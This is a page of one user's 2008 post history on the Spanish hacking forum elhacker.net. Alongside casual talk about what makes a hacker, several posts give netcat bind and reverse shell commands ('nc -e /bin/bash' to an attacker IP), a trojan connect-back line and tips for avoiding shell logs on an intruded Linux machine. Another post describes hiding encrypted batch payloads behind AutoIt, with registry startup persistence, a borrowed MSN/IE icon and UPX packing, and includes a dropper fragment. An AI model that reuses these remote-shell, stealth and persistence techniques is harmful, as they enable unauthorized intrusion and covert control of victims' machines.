elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23 24 25 26 27 28
201  Foros Generales / Foro Libre / Re: que es lo minimo que debe saber alguien para considerarse hacker? en: 19 Abril 2008, 06:50 am
xD!! ... si claro, jaja!... pero recorda que los verdaderos hackers pocas veces se dedicaron a eso. Mira Kevin Poulsen, dedicado a las líneas telefónicas, y un hacker... Kevin Mitnick, su afición principal era la intromisión en sistemas, y ahí el robo de información confidencial... y fue el más grande, o al menos entre ellos anda... Drapper (Capitan Crunch), fue el primero y siempre se dedico a la telefonía... Y la mayor parte de los hackers encuentran su afición en el desarrollo y conocimiento de un sistema, por eso tantos estan metidos en el desarrollo de Linux.

xD :: . el messenger es para lammers
202  Seguridad Informática / Hacking / Re: Jugando con netcat en: 19 Abril 2008, 05:53 am
Si podes ver los documentos... :¬¬

Documentos de texto: Necesitarás instalarle remotamente un programa de lectura de consola tal como ViM, o nano... se que hay versiones para Windows. El mismo cmd debería redireccionartelo a tu consola, a través de la red. Por lo menos asi lo he logrado yo. Entonces editaras el texto desde tu máquina... para que no te lies, ViM funcionaría de la misma manera que la shell, es decir que se ejecuta en la máquina de él y la entrada y salida estándar se desvían a tu máquina, por lo que ViM advertirá que la entrada NO es de un Terminal...

Documentos de tipos binarios: Digo así porque, por ejemplo... un documento de tipo HTML, por ejemplo, no es TXT pero sí es de texto, en cambio uno de Word es binario, y no lograrás editarlo de ésta manera... en ese caso es obligatoria la transferencia, para editarlo en tu casita... Hay otros medios para editarlo pero requerirían que hagas un programa que automatice el trabajo con archivos de Word sin abrir Word, para lo que te puede servir AutoIt, pero es más sencillo transferirlo y editarlo, para luego reemplazarlo.

Es decir... habría manera de editar todo tipo de archivos desde la consola, como no si en Linux los hay, pero no te lies demasiado, te conviene transferir los binarios.
203  Foros Generales / Foro Libre / Re: que es lo minimo que debe saber alguien para considerarse hacker? en: 18 Abril 2008, 00:07 am
Hacker es el que le apasiona aprender "Mas alla de lo que se debería saber"... simple y llano, puedes se un hacker en el area Quimica, y hacer cualquier cosa con un tarrito de aceite... o puedes ser un hacker en el area informática, que es en la que nos especializamos nosotros... pero recordemos que el Capitan Crunch, tanto como Mitnick, Phiber Optic y otros, se especializaron casi siempre en las comunicaciónes, y sobre todo en telefonía. No en programación.

¿Que es lo minimo? - Te puedes considerar hacker cuando un hacker respetado te considere parte del medio, es decir, cuando "ellos" te consideren un hacker.
Recordemos que el Cap. Crunch tenía muchos alumnos, pero no los consideraba hackers, y terminaron haciendose ver, hablando de más a un periodista, y arruinandolo todo por decir "HEY MIRENME!!...SOY UN HACKER!!"

Lammers . . .
204  Foros Generales / Foro Libre / Re: Sus escritorios en: 17 Abril 2008, 01:46 am
Mmm... me tiro más por la paranoia  ;D no lo veo necesario...
205  Seguridad Informática / Hacking / Re: Jugando con netcat en: 17 Abril 2008, 01:02 am
No te transformes en un s|{rIpt kiddi3, estudia, razona, despues haces las cosas.

127.0.0.1 es tu propia makina, es el host local, o localhost, la manera con la que tu máquina se refiere a ella misma, y es igual con WHK que con vos.
Para conectarte de la manera que vos pones en tu makina, el troyano debería ejecutar:

nc -vv TU_IP 80

y listo... Si se te corta la conexión ya hablamos de otro tema, por ejemplo un firewall o un antivirus.

Lee y aprende que eslo que estás haciendondo. Protocolo TCP/IP, Sockets, etcétera...
206  Seguridad Informática / Hacking / Re: Jugando con netcat en: 16 Abril 2008, 14:59 pm
Thylzos:
Eterm NO es un intérprete de comandos sino un emulador de terminal. lo que deberías ejecutar es el shell que deseas abrir, ya sea bash (/bin/bash), sh, csh, python, o cualquier shell o programa capáz de aceptar STDIN y STDOUT  ;D.
Si ejecutas Eterm, le saldrá eterm al usuario, y te quedarás con la salida de consola que son los errores, y toda la salida que eterm haga al STDOUT o STDERR fuera de su interfaz.
deberías usar "nc -l -vv -e /bin/bash -p 80" en la máquina ajena y "nc -vv IP 80" en la tuya o bien inversa haciendo "nc -vv -e /bin/bash TU_IP 80" en la máquina con Linux y "nc -vv -l -p 80" en la tuya.

El problema es que Linux no te permitirá usar un puerto privilegiado sin privilegios, asíque deberás conectar por uno como el 3000 o algo así. Otro problema es que TODAS las shells en Linux crean Logs a los que no podrás acceder, y eso significa que cualquier medianamente buen administrador se dará cuenta de tu presencia.
Otro tema es que sin privilegios de root no podrás hacer nada entretenido en el sistema (No es como Winbug$).

Para concluir, deberás conocer un poco del funcionamiento de Linux, y obtener privilegios, si deseas que esa shell se te conecte cada cierto tiempo, o cada inicio.

Lo mejor cuando te introduces en un sistema Linux así es usar un intérprete como csh cuyos logs no se suelen andar visando, a menos que uses un script o un programa como ACID Lab, en ese caso estás frito porque no solo se darán cuenta que estás, sino que a demás te sacarán el IP.
Jeje... te creiste que entrar en Linux era cosa de juego como entrar en Windoze? >:D

LinuX RuleZ!
207  Foros Generales / Foro Libre / Re: Sus escritorios en: 10 Abril 2008, 22:53 pm
Lo que no entiendo es porqué tachar tu cuenta y tu IP...  :rolleyes:
208  Seguridad Informática / Hacking / Re: Jugando con netcat en: 4 Abril 2008, 01:55 am
No detecta a ninguno de los dos como troyanos... segun las bases de datos de antivirus son o rootkits (No se porque pero bueh)... o hacking tools (ahi me gusto más el nombre), o "software potencialmente no deseado".

Por otro lado las empresas antivirus crean defensas contra lo que ya conocen, y nunca podran detectar nuevas tecnologias de hacking. Un troyano no es un programa que le dice al PC "Hey, soy un troyano, dame el control del sistema", es una compleja maraña de codigo lista para ejecutarse y dejarnos con el control del sistema ante la primera posibilidad.

Lee al respecto, lee mil veces antes de hacer un pregunta que Google te respondera contento.
209  Programación / Scripting / Re: Uso de RunDll32 en: 5 Marzo 2008, 20:19 pm
-[black_hack]-:
Muy bueno... me gusta la info. Eso nos amplia mucho las capacidades y nos ahorra tiempo de escritura. Eso más NirCmd y otras cositas... es tan atractivo.

scmdk:
Observa con cuidado:

RunDll32.exe

Es un ejecutable, y por eso se puede usar desde un bat.
¿Donde? - donde se te cante.
¿Como trabajar con eso? - Hace por lo menos 200 pruevas y si seguis sin poder usarlo entonces haces esa pregunta. Creeme que despues de 200 pruevas si o si vas a lograr algo, y en todo caso tu pregunta sera mucho más sofisticada, y orientada al uso más complejo de ésta info.

Si probas y probas y probas antes de preguntar, no tendrias porque hacer preguntas y decir: "disculpa que se escuche tonto".

Es un consejo, no es bardo... pero aprendes más probando y rompiendo que haciendo 1500 preguntas y sin programar nada (perdon por usar la palabra "programar" para decir "Escribir un Batch"...  ;D)
210  Programación / Scripting / Re: Ejecutando bats ocultos by H-BlacK (Sin pasar a exe) en: 5 Marzo 2008, 20:04 pm
Muy bueno...

Yo tengo otro método que me permite ejecutar mis bats sin que el usuario se de cuenta, los hice en AutoIt... el más básico es:

Código:
ShellExecute($CmdLine[1],"","","open"@SW_HIDE)

Simple no?  ;D

Aunque lo que más que uso es incorporar el descifrado, con la funcion _StringEncrypt() dada en el archivo String.au3. Es un algoritmo basado en RC4 asi que es muy fuerte y los bats quedan ilegibles. Los desencriptas, los ejecutas ocultos, los encriptas, y nadie hizo nada. El usuario solamente nota un pequeño aletargo en el PC (cuando se cifra y descifra se carga el CPU), y nada más. Claro que si le das un nivel de cifrado de 128 sera mucho mas que un aletargo y tendrá suerte si no le sale humo del CPU!!  :xD Hay que usar como máximo un nivel 2.

El ejecutable lo pones bien escondido (tambien vale usar upx) y con eso o una variacion podes ejecutar todos los bats que quieras, incluir una llamada en el registro para que se ejecuten al iniciar... lo que quieras, todo es oculto, a demás el compilador Aut2Exe permite elegir un icono... icono que podemos extraer, no se, del MSN, del IE... a gusto.

Por cierto, en el codigo tenes algo mal, el echo de la variable %a% va con un espacio al final, de otra forma no funciona porque quedaria todo junto.
Y un tip para los que usen el bat: Si ponen, por ejemplo %a%echo "HOLA">Archivo tendran problemas, recuerden que la %a% es un echo y deben usar caracteres de escape, asi: %a%echo "HOLA"^>Archivo

Esta seria la cabecera buena, con el espacio que le faltaba (al final del echo):

Código
  1. @echo off
  2. cd %systemroot%\system32
  3. call:codebat > "RunDll32.bat"
  4. call:run > "RunDll32.com"
  5. If exist 1.exe goto y
  6. RunDll32.com > nul
  7.  
Páginas: 1 ... 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 [21] 22 23 24 25 26 27 28
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines